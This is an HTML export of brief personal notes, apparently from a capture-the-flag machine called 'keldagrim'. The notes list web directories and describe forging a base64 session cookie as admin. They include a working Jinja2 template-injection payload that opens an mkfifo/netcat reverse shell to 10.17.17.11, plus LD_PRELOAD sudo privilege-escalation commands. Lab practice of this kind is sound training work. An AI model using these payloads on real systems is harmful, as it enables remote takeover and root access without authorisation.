<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>keldagrim</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>keldagrim</h1>

      <div class="ck-content">
        <p>web directories: /wow,  /OSRunescape, /<a href="#root/AIB284Wkwuq7">runescape, /admin</a>

        </p>
        <p>Jed, jad</p>
        <p>base64 session cookie, change to admin</p>
         <h2>SSTI Exploit</h2>

        <p><code>{{ ''.__class__.__mro__[1].__subclasses__()[401]("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.17.17.11 9999 &gt;/tmp/f", shell=True, stdout=-1).communicate() }}</code>

        </p>
        <p>nc mkfifo shell is most effective</p>
         <h2><strong>Privesc:</strong></h2>

        <p><code>gcc -fPIC -shared -o shell.so shell.c -nostartfiles</code>

        </p>
        <p><code>sudo LD_PRELOAD=/tmp/shell.so &lt;sudo binary&gt;</code>

        </p>
      </div>
    </div>
  </body>

</html>